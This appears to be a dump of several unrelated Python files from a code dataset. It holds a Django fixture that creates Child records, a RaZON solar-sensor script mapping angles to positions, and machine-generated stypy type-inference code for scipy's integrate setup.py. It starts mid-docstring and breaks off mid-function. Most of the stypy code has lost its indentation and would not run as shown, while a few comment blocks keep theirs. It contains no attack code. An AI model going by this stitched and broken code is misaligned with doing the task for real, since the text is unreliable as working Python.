    Replaces eight copy-pasted create/add/save stanzas with one data table
    and a loop; record order, school pks and family-add order are preserved.
    """

    # (first_name, last_name, school_pk, family Person pks in add order)
    _CHILDREN = (
        ('Timmy', 'Thompson', 1, (1, 2)),
        ('Jimmy', 'Johnson', 2, (2, 1)),
        ('Bart', 'Simpson', 3, (3, 4)),
        ('Lisa', 'Simpson', 4, (4, 3)),
        ('Andrew', 'Becker', 5, (5, 6)),
        ('Jasmine', 'Goulette', 6, (6, 5)),
        ('Kristina', 'Murry', 7, (7, 8)),
        ('Andrew', 'Scheonster', 8, (8, 7)),
    )

    def __init__(self, scriptName=None):
        # scriptName is unused but kept for interface compatibility.
        for first_name, last_name, school_pk, family_pks in self._CHILDREN:
            self._create_child(first_name, last_name, school_pk, family_pks)

    @staticmethod
    def _create_child(first_name, last_name, school_pk, family_pks):
        # Create one Child, attach its family members in order, then save.
        child = Child.objects.create(
            first_name=first_name,
            last_name=last_name,
            school=School.objects.get(pk=school_pk),
        )
        for person_pk in family_pks:
            child.family.add(Person.objects.get(pk=person_pk))
        child.save()
|
7,962 | 13a4fb5ce9ab0a3ef9ce503698615eae4157a637 | #!/usr/bin/env python
from cos_correct_v2 import *
from angle_to_position import *
import pandas as pd
import datetime as dt
def get_position_from_angle(razon, data, start, end):
    """Map RaZON angle measurements to (x, y) positions.

    Parameters
    ----------
    razon : RaZON
        Device wrapper used for the cosine correction.
    data : tuple
        (dni_df, altitude_angles, azimuth_angles), as returned by
        RaZON.request_interval.
    start, end : datetime
        Unused here; kept for interface compatibility with callers.

    Returns
    -------
    pandas.DataFrame
        One row per sample: matched x, matched y, and 'Datetime Local'.
    """
    # Obtain cos factors and cosine-correct the data.
    dni_df, altitude_angles, azimuth_angles = data
    cos_correct_df = razon.get_cos_factors(altitude_angles, azimuth_angles)
    dni_df = razon.cos_correct(dni_df, cos_correct_df)

    angles = pd.DataFrame()
    angles['Theta'] = dni_df['Theta_']
    angles['Phi'] = dni_df['Phi_']

    # PERF FIX: load the angle->position mapping once.  The original wrapper
    # called read_and_clean_angle_position() inside apply(), re-reading the
    # mapping for every single row.
    mapping = read_and_clean_angle_position()
    matches = angles.apply(lambda row: match_angles(mapping, row[0], row[1]), axis=1)

    pairs = [(m[0], m[1]) for m in matches]
    positions = pd.DataFrame(zip(*pairs)).transpose()
    positions['Datetime Local'] = dni_df['Datetime Local']
    return positions
def main():
    """Fetch one afternoon of RaZON data and print the matched positions."""
    # Communicate to RaZON through local webpage
    razon = RaZON(lat=37.595932, lon=-122.368848, panel_tilt=20, razonIP="192.168.15.150")
    # Use RaZON.get_local_datetime
    # now = razon.get_local_datetime() - dt.timedelta(days=1)
    # Hard-coded analysis date; the live-date path above is disabled.
    now = dt.datetime(2018, 4, 9)
    # Samples data between two datetime objects (date is supplied by )
    # Window: 13:45 to 16:00 local on the chosen date.
    start = dt.datetime(year=now.year,
                        month=now.month,
                        day=now.day,
                        hour=13,
                        minute=45,
                        second=0)
    end = dt.datetime(year=now.year,
                      month=now.month,
                      day=now.day,
                      hour=16,
                      minute=0,
                      second=0)
    data = razon.request_interval(now, start, end)
    positions = get_position_from_angle(razon, data, start, end)
    print(positions)
    # # Loop through appropriate angles:
    # for angle in angles:
    #     mapping = read_and_clean_angle_position()
    #     x, y = match_angles(mapping, theta, phi)
if __name__ == '__main__':
    main()
|
7,963 | 4453b8176cda60a3a8f4800860b87bddfdb6cafa |
# -*- coding: utf-8 -*-
"""
ORIGINAL PROGRAM SOURCE CODE:
1: from __future__ import division, print_function, absolute_import
2:
3: import os
4: from os.path import join
5:
6: from scipy._build_utils import numpy_nodepr_api
7:
8:
9: def configuration(parent_package='',top_path=None):
10: from numpy.distutils.misc_util import Configuration
11: from numpy.distutils.system_info import get_info
12: config = Configuration('integrate', parent_package, top_path)
13:
14: # Get a local copy of lapack_opt_info
15: lapack_opt = dict(get_info('lapack_opt',notfound_action=2))
16: # Pop off the libraries list so it can be combined with
17: # additional required libraries
18: lapack_libs = lapack_opt.pop('libraries', [])
19:
20: mach_src = [join('mach','*.f')]
21: quadpack_src = [join('quadpack', '*.f')]
22: lsoda_src = [join('odepack', fn) for fn in [
23: 'blkdta000.f', 'bnorm.f', 'cfode.f',
24: 'ewset.f', 'fnorm.f', 'intdy.f',
25: 'lsoda.f', 'prja.f', 'solsy.f', 'srcma.f',
26: 'stoda.f', 'vmnorm.f', 'xerrwv.f', 'xsetf.f',
27: 'xsetun.f']]
28: vode_src = [join('odepack', 'vode.f'), join('odepack', 'zvode.f')]
29: dop_src = [join('dop','*.f')]
30: quadpack_test_src = [join('tests','_test_multivariate.c')]
31: odeint_banded_test_src = [join('tests', 'banded5x5.f')]
32:
33: config.add_library('mach', sources=mach_src,
34: config_fc={'noopt':(__file__,1)})
35: config.add_library('quadpack', sources=quadpack_src)
36: config.add_library('lsoda', sources=lsoda_src)
37: config.add_library('vode', sources=vode_src)
38: config.add_library('dop', sources=dop_src)
39:
40: # Extensions
41: # quadpack:
42: include_dirs = [join(os.path.dirname(__file__), '..', '_lib', 'src')]
43: if 'include_dirs' in lapack_opt:
44: lapack_opt = dict(lapack_opt)
45: include_dirs.extend(lapack_opt.pop('include_dirs'))
46:
47: config.add_extension('_quadpack',
48: sources=['_quadpackmodule.c'],
49: libraries=['quadpack', 'mach'] + lapack_libs,
50: depends=(['__quadpack.h']
51: + quadpack_src + mach_src),
52: include_dirs=include_dirs,
53: **lapack_opt)
54:
55: # odepack/lsoda-odeint
56: odepack_opts = lapack_opt.copy()
57: odepack_opts.update(numpy_nodepr_api)
58: config.add_extension('_odepack',
59: sources=['_odepackmodule.c'],
60: libraries=['lsoda', 'mach'] + lapack_libs,
61: depends=(lsoda_src + mach_src),
62: **odepack_opts)
63:
64: # vode
65: config.add_extension('vode',
66: sources=['vode.pyf'],
67: libraries=['vode'] + lapack_libs,
68: depends=vode_src,
69: **lapack_opt)
70:
71: # lsoda
72: config.add_extension('lsoda',
73: sources=['lsoda.pyf'],
74: libraries=['lsoda', 'mach'] + lapack_libs,
75: depends=(lsoda_src + mach_src),
76: **lapack_opt)
77:
78: # dop
79: config.add_extension('_dop',
80: sources=['dop.pyf'],
81: libraries=['dop'],
82: depends=dop_src)
83:
84: config.add_extension('_test_multivariate',
85: sources=quadpack_test_src)
86:
87: # Fortran+f2py extension module for testing odeint.
88: config.add_extension('_test_odeint_banded',
89: sources=odeint_banded_test_src,
90: libraries=['lsoda', 'mach'] + lapack_libs,
91: depends=(lsoda_src + mach_src),
92: **lapack_opt)
93:
94: config.add_subpackage('_ivp')
95:
96: config.add_data_dir('tests')
97: return config
98:
99:
100: if __name__ == '__main__':
101: from numpy.distutils.core import setup
102: setup(**configuration(top_path='').todict())
103:
"""
# Import the stypy library necessary elements
from stypy.type_inference_programs.type_inference_programs_imports import *
# Create the module type store
module_type_store = Context(None, __file__)
# ################# Begin of the type inference program ##################
stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 3, 0))
# 'import os' statement (line 3)
import os
import_module(stypy.reporting.localization.Localization(__file__, 3, 0), 'os', os, module_type_store)
stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 4, 0))
# 'from os.path import join' statement (line 4)
update_path_to_current_file_folder('C:/Python27/lib/site-packages/scipy/integrate/')
import_32066 = generate_type_inference_code_for_module(stypy.reporting.localization.Localization(__file__, 4, 0), 'os.path')
if (type(import_32066) is not StypyTypeError):
if (import_32066 != 'pyd_module'):
__import__(import_32066)
sys_modules_32067 = sys.modules[import_32066]
import_from_module(stypy.reporting.localization.Localization(__file__, 4, 0), 'os.path', sys_modules_32067.module_type_store, module_type_store, ['join'])
nest_module(stypy.reporting.localization.Localization(__file__, 4, 0), __file__, sys_modules_32067, sys_modules_32067.module_type_store, module_type_store)
else:
from os.path import join
import_from_module(stypy.reporting.localization.Localization(__file__, 4, 0), 'os.path', None, module_type_store, ['join'], [join])
else:
# Assigning a type to the variable 'os.path' (line 4)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 4, 0), 'os.path', import_32066)
remove_current_file_folder_from_path('C:/Python27/lib/site-packages/scipy/integrate/')
# --- stypy-generated type-inference scaffolding (do not edit by hand) ---
# Mirrors the statement `from scipy._build_utils import numpy_nodepr_api` at
# line 6 of the original setup.py.  Same generated pattern as the preceding
# import: resolve the module via stypy, then register 'numpy_nodepr_api' in
# the module type store, falling back to a real import for binary extension
# modules, or storing the StypyTypeError on failure.
stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 6, 0))
# 'from scipy._build_utils import numpy_nodepr_api' statement (line 6)
update_path_to_current_file_folder('C:/Python27/lib/site-packages/scipy/integrate/')
import_32068 = generate_type_inference_code_for_module(stypy.reporting.localization.Localization(__file__, 6, 0), 'scipy._build_utils')
# Resolution succeeded: import_32068 is either a module name or 'pyd_module'.
if (type(import_32068) is not StypyTypeError):
    # A type-inference equivalent of the module exists: import it and copy
    # the requested member ('numpy_nodepr_api') into this type store.
    if (import_32068 != 'pyd_module'):
        __import__(import_32068)
        sys_modules_32069 = sys.modules[import_32068]
        import_from_module(stypy.reporting.localization.Localization(__file__, 6, 0), 'scipy._build_utils', sys_modules_32069.module_type_store, module_type_store, ['numpy_nodepr_api'])
        nest_module(stypy.reporting.localization.Localization(__file__, 6, 0), __file__, sys_modules_32069, sys_modules_32069.module_type_store, module_type_store)
    else:
        # Binary extension module: fall back to the real runtime import and
        # register the live object directly.
        from scipy._build_utils import numpy_nodepr_api
        import_from_module(stypy.reporting.localization.Localization(__file__, 6, 0), 'scipy._build_utils', None, module_type_store, ['numpy_nodepr_api'], [numpy_nodepr_api])
else:
    # Module could not be resolved: store the error object as the type of
    # 'scipy._build_utils' so later uses report the failure.
    # Assigning a type to the variable 'scipy._build_utils' (line 6)
    module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 6, 0), 'scipy._build_utils', import_32068)
# Undo the sys.path modification made above.
remove_current_file_folder_from_path('C:/Python27/lib/site-packages/scipy/integrate/')
@norecursion
def configuration(localization, *varargs, **kwargs):
global module_type_store
# Assign values to the parameters with defaults
str_32070 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 9, 33), 'str', '')
# Getting the type of 'None' (line 9)
None_32071 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 9, 45), 'None')
defaults = [str_32070, None_32071]
# Create a new context for function 'configuration'
module_type_store = module_type_store.open_function_context('configuration', 9, 0, False)
# Passed parameters checking function
configuration.stypy_localization = localization
configuration.stypy_type_of_self = None
configuration.stypy_type_store = module_type_store
configuration.stypy_function_name = 'configuration'
configuration.stypy_param_names_list = ['parent_package', 'top_path']
configuration.stypy_varargs_param_name = None
configuration.stypy_kwargs_param_name = None
configuration.stypy_call_defaults = defaults
configuration.stypy_call_varargs = varargs
configuration.stypy_call_kwargs = kwargs
arguments = process_argument_values(localization, None, module_type_store, 'configuration', ['parent_package', 'top_path'], None, None, defaults, varargs, kwargs)
if is_error_type(arguments):
# Destroy the current context
module_type_store = module_type_store.close_function_context()
return arguments
# Initialize method data
init_call_information(module_type_store, 'configuration', localization, ['parent_package', 'top_path'], arguments)
# Default return type storage variable (SSA)
# Assigning a type to the variable 'stypy_return_type'
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 0, 0), 'stypy_return_type', None)
# ################# Begin of 'configuration(...)' code ##################
stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 10, 4))
# 'from numpy.distutils.misc_util import Configuration' statement (line 10)
update_path_to_current_file_folder('C:/Python27/lib/site-packages/scipy/integrate/')
import_32072 = generate_type_inference_code_for_module(stypy.reporting.localization.Localization(__file__, 10, 4), 'numpy.distutils.misc_util')
if (type(import_32072) is not StypyTypeError):
if (import_32072 != 'pyd_module'):
__import__(import_32072)
sys_modules_32073 = sys.modules[import_32072]
import_from_module(stypy.reporting.localization.Localization(__file__, 10, 4), 'numpy.distutils.misc_util', sys_modules_32073.module_type_store, module_type_store, ['Configuration'])
nest_module(stypy.reporting.localization.Localization(__file__, 10, 4), __file__, sys_modules_32073, sys_modules_32073.module_type_store, module_type_store)
else:
from numpy.distutils.misc_util import Configuration
import_from_module(stypy.reporting.localization.Localization(__file__, 10, 4), 'numpy.distutils.misc_util', None, module_type_store, ['Configuration'], [Configuration])
else:
# Assigning a type to the variable 'numpy.distutils.misc_util' (line 10)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 10, 4), 'numpy.distutils.misc_util', import_32072)
remove_current_file_folder_from_path('C:/Python27/lib/site-packages/scipy/integrate/')
stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 11, 4))
# 'from numpy.distutils.system_info import get_info' statement (line 11)
update_path_to_current_file_folder('C:/Python27/lib/site-packages/scipy/integrate/')
import_32074 = generate_type_inference_code_for_module(stypy.reporting.localization.Localization(__file__, 11, 4), 'numpy.distutils.system_info')
if (type(import_32074) is not StypyTypeError):
if (import_32074 != 'pyd_module'):
__import__(import_32074)
sys_modules_32075 = sys.modules[import_32074]
import_from_module(stypy.reporting.localization.Localization(__file__, 11, 4), 'numpy.distutils.system_info', sys_modules_32075.module_type_store, module_type_store, ['get_info'])
nest_module(stypy.reporting.localization.Localization(__file__, 11, 4), __file__, sys_modules_32075, sys_modules_32075.module_type_store, module_type_store)
else:
from numpy.distutils.system_info import get_info
import_from_module(stypy.reporting.localization.Localization(__file__, 11, 4), 'numpy.distutils.system_info', None, module_type_store, ['get_info'], [get_info])
else:
# Assigning a type to the variable 'numpy.distutils.system_info' (line 11)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 11, 4), 'numpy.distutils.system_info', import_32074)
remove_current_file_folder_from_path('C:/Python27/lib/site-packages/scipy/integrate/')
# Assigning a Call to a Name (line 12):
# Call to Configuration(...): (line 12)
# Processing the call arguments (line 12)
str_32077 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 12, 27), 'str', 'integrate')
# Getting the type of 'parent_package' (line 12)
parent_package_32078 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 12, 40), 'parent_package', False)
# Getting the type of 'top_path' (line 12)
top_path_32079 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 12, 56), 'top_path', False)
# Processing the call keyword arguments (line 12)
kwargs_32080 = {}
# Getting the type of 'Configuration' (line 12)
Configuration_32076 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 12, 13), 'Configuration', False)
# Calling Configuration(args, kwargs) (line 12)
Configuration_call_result_32081 = invoke(stypy.reporting.localization.Localization(__file__, 12, 13), Configuration_32076, *[str_32077, parent_package_32078, top_path_32079], **kwargs_32080)
# Assigning a type to the variable 'config' (line 12)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 12, 4), 'config', Configuration_call_result_32081)
# Assigning a Call to a Name (line 15):
# Call to dict(...): (line 15)
# Processing the call arguments (line 15)
# Call to get_info(...): (line 15)
# Processing the call arguments (line 15)
str_32084 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 15, 31), 'str', 'lapack_opt')
# Processing the call keyword arguments (line 15)
int_32085 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 15, 60), 'int')
keyword_32086 = int_32085
kwargs_32087 = {'notfound_action': keyword_32086}
# Getting the type of 'get_info' (line 15)
get_info_32083 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 15, 22), 'get_info', False)
# Calling get_info(args, kwargs) (line 15)
get_info_call_result_32088 = invoke(stypy.reporting.localization.Localization(__file__, 15, 22), get_info_32083, *[str_32084], **kwargs_32087)
# Processing the call keyword arguments (line 15)
kwargs_32089 = {}
# Getting the type of 'dict' (line 15)
dict_32082 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 15, 17), 'dict', False)
# Calling dict(args, kwargs) (line 15)
dict_call_result_32090 = invoke(stypy.reporting.localization.Localization(__file__, 15, 17), dict_32082, *[get_info_call_result_32088], **kwargs_32089)
# Assigning a type to the variable 'lapack_opt' (line 15)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 15, 4), 'lapack_opt', dict_call_result_32090)
# Assigning a Call to a Name (line 18):
# Call to pop(...): (line 18)
# Processing the call arguments (line 18)
str_32093 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 18, 33), 'str', 'libraries')
# Obtaining an instance of the builtin type 'list' (line 18)
list_32094 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 18, 46), 'list')
# Adding type elements to the builtin type 'list' instance (line 18)
# Processing the call keyword arguments (line 18)
kwargs_32095 = {}
# Getting the type of 'lapack_opt' (line 18)
lapack_opt_32091 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 18, 18), 'lapack_opt', False)
# Obtaining the member 'pop' of a type (line 18)
pop_32092 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 18, 18), lapack_opt_32091, 'pop')
# Calling pop(args, kwargs) (line 18)
pop_call_result_32096 = invoke(stypy.reporting.localization.Localization(__file__, 18, 18), pop_32092, *[str_32093, list_32094], **kwargs_32095)
# Assigning a type to the variable 'lapack_libs' (line 18)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 18, 4), 'lapack_libs', pop_call_result_32096)
# Assigning a List to a Name (line 20):
# Obtaining an instance of the builtin type 'list' (line 20)
list_32097 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 20, 15), 'list')
# Adding type elements to the builtin type 'list' instance (line 20)
# Adding element type (line 20)
# Call to join(...): (line 20)
# Processing the call arguments (line 20)
str_32099 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 20, 21), 'str', 'mach')
str_32100 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 20, 28), 'str', '*.f')
# Processing the call keyword arguments (line 20)
kwargs_32101 = {}
# Getting the type of 'join' (line 20)
join_32098 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 20, 16), 'join', False)
# Calling join(args, kwargs) (line 20)
join_call_result_32102 = invoke(stypy.reporting.localization.Localization(__file__, 20, 16), join_32098, *[str_32099, str_32100], **kwargs_32101)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 20, 15), list_32097, join_call_result_32102)
# Assigning a type to the variable 'mach_src' (line 20)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 20, 4), 'mach_src', list_32097)
# Assigning a List to a Name (line 21):
# Obtaining an instance of the builtin type 'list' (line 21)
list_32103 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 21, 19), 'list')
# Adding type elements to the builtin type 'list' instance (line 21)
# Adding element type (line 21)
# Call to join(...): (line 21)
# Processing the call arguments (line 21)
str_32105 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 21, 25), 'str', 'quadpack')
str_32106 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 21, 37), 'str', '*.f')
# Processing the call keyword arguments (line 21)
kwargs_32107 = {}
# Getting the type of 'join' (line 21)
join_32104 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 21, 20), 'join', False)
# Calling join(args, kwargs) (line 21)
join_call_result_32108 = invoke(stypy.reporting.localization.Localization(__file__, 21, 20), join_32104, *[str_32105, str_32106], **kwargs_32107)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 21, 19), list_32103, join_call_result_32108)
# Assigning a type to the variable 'quadpack_src' (line 21)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 21, 4), 'quadpack_src', list_32103)
# Assigning a ListComp to a Name (line 22):
# Calculating list comprehension
# Calculating comprehension expression
# Obtaining an instance of the builtin type 'list' (line 22)
list_32114 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 22, 47), 'list')
# Adding type elements to the builtin type 'list' instance (line 22)
# Adding element type (line 22)
str_32115 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 23, 8), 'str', 'blkdta000.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32115)
# Adding element type (line 22)
str_32116 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 23, 23), 'str', 'bnorm.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32116)
# Adding element type (line 22)
str_32117 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 23, 34), 'str', 'cfode.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32117)
# Adding element type (line 22)
str_32118 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 24, 8), 'str', 'ewset.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32118)
# Adding element type (line 22)
str_32119 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 24, 19), 'str', 'fnorm.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32119)
# Adding element type (line 22)
str_32120 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 24, 30), 'str', 'intdy.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32120)
# Adding element type (line 22)
str_32121 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 25, 8), 'str', 'lsoda.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32121)
# Adding element type (line 22)
str_32122 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 25, 19), 'str', 'prja.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32122)
# Adding element type (line 22)
str_32123 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 25, 29), 'str', 'solsy.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32123)
# Adding element type (line 22)
str_32124 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 25, 40), 'str', 'srcma.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32124)
# Adding element type (line 22)
str_32125 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 26, 8), 'str', 'stoda.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32125)
# Adding element type (line 22)
str_32126 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 26, 19), 'str', 'vmnorm.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32126)
# Adding element type (line 22)
str_32127 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 26, 31), 'str', 'xerrwv.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32127)
# Adding element type (line 22)
str_32128 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 26, 43), 'str', 'xsetf.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32128)
# Adding element type (line 22)
str_32129 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 27, 8), 'str', 'xsetun.f')
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 47), list_32114, str_32129)
comprehension_32130 = get_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 17), list_32114)
# Assigning a type to the variable 'fn' (line 22)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 22, 17), 'fn', comprehension_32130)
# Call to join(...): (line 22)
# Processing the call arguments (line 22)
str_32110 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 22, 22), 'str', 'odepack')
# Getting the type of 'fn' (line 22)
fn_32111 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 22, 33), 'fn', False)
# Processing the call keyword arguments (line 22)
kwargs_32112 = {}
# Getting the type of 'join' (line 22)
join_32109 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 22, 17), 'join', False)
# Calling join(args, kwargs) (line 22)
join_call_result_32113 = invoke(stypy.reporting.localization.Localization(__file__, 22, 17), join_32109, *[str_32110, fn_32111], **kwargs_32112)
list_32131 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 22, 17), 'list')
set_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 17), list_32131, join_call_result_32113)
# Assigning a type to the variable 'lsoda_src' (line 22)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 22, 4), 'lsoda_src', list_32131)
# Assigning a List to a Name (line 28):
# Obtaining an instance of the builtin type 'list' (line 28)
list_32132 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 28, 15), 'list')
# Adding type elements to the builtin type 'list' instance (line 28)
# Adding element type (line 28)
# Call to join(...): (line 28)
# Processing the call arguments (line 28)
str_32134 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 28, 21), 'str', 'odepack')
str_32135 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 28, 32), 'str', 'vode.f')
# Processing the call keyword arguments (line 28)
kwargs_32136 = {}
# Getting the type of 'join' (line 28)
join_32133 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 28, 16), 'join', False)
# Calling join(args, kwargs) (line 28)
join_call_result_32137 = invoke(stypy.reporting.localization.Localization(__file__, 28, 16), join_32133, *[str_32134, str_32135], **kwargs_32136)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 28, 15), list_32132, join_call_result_32137)
# Adding element type (line 28)
# Call to join(...): (line 28)
# Processing the call arguments (line 28)
str_32139 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 28, 48), 'str', 'odepack')
str_32140 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 28, 59), 'str', 'zvode.f')
# Processing the call keyword arguments (line 28)
kwargs_32141 = {}
# Getting the type of 'join' (line 28)
join_32138 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 28, 43), 'join', False)
# Calling join(args, kwargs) (line 28)
join_call_result_32142 = invoke(stypy.reporting.localization.Localization(__file__, 28, 43), join_32138, *[str_32139, str_32140], **kwargs_32141)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 28, 15), list_32132, join_call_result_32142)
# Assigning a type to the variable 'vode_src' (line 28)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 28, 4), 'vode_src', list_32132)
# Assigning a List to a Name (line 29):
# Obtaining an instance of the builtin type 'list' (line 29)
list_32143 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 29, 14), 'list')
# Adding type elements to the builtin type 'list' instance (line 29)
# Adding element type (line 29)
# Call to join(...): (line 29)
# Processing the call arguments (line 29)
str_32145 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 29, 20), 'str', 'dop')
str_32146 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 29, 26), 'str', '*.f')
# Processing the call keyword arguments (line 29)
kwargs_32147 = {}
# Getting the type of 'join' (line 29)
join_32144 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 29, 15), 'join', False)
# Calling join(args, kwargs) (line 29)
join_call_result_32148 = invoke(stypy.reporting.localization.Localization(__file__, 29, 15), join_32144, *[str_32145, str_32146], **kwargs_32147)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 29, 14), list_32143, join_call_result_32148)
# Assigning a type to the variable 'dop_src' (line 29)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 29, 4), 'dop_src', list_32143)
# Assigning a List to a Name (line 30):
# Obtaining an instance of the builtin type 'list' (line 30)
list_32149 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 30, 24), 'list')
# Adding type elements to the builtin type 'list' instance (line 30)
# Adding element type (line 30)
# Call to join(...): (line 30)
# Processing the call arguments (line 30)
str_32151 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 30, 30), 'str', 'tests')
str_32152 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 30, 38), 'str', '_test_multivariate.c')
# Processing the call keyword arguments (line 30)
kwargs_32153 = {}
# Getting the type of 'join' (line 30)
join_32150 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 30, 25), 'join', False)
# Calling join(args, kwargs) (line 30)
join_call_result_32154 = invoke(stypy.reporting.localization.Localization(__file__, 30, 25), join_32150, *[str_32151, str_32152], **kwargs_32153)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 30, 24), list_32149, join_call_result_32154)
# Assigning a type to the variable 'quadpack_test_src' (line 30)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 30, 4), 'quadpack_test_src', list_32149)
# Assigning a List to a Name (line 31):
# Obtaining an instance of the builtin type 'list' (line 31)
list_32155 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 31, 29), 'list')
# Adding type elements to the builtin type 'list' instance (line 31)
# Adding element type (line 31)
# Call to join(...): (line 31)
# Processing the call arguments (line 31)
str_32157 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 31, 35), 'str', 'tests')
str_32158 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 31, 44), 'str', 'banded5x5.f')
# Processing the call keyword arguments (line 31)
kwargs_32159 = {}
# Getting the type of 'join' (line 31)
join_32156 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 31, 30), 'join', False)
# Calling join(args, kwargs) (line 31)
join_call_result_32160 = invoke(stypy.reporting.localization.Localization(__file__, 31, 30), join_32156, *[str_32157, str_32158], **kwargs_32159)
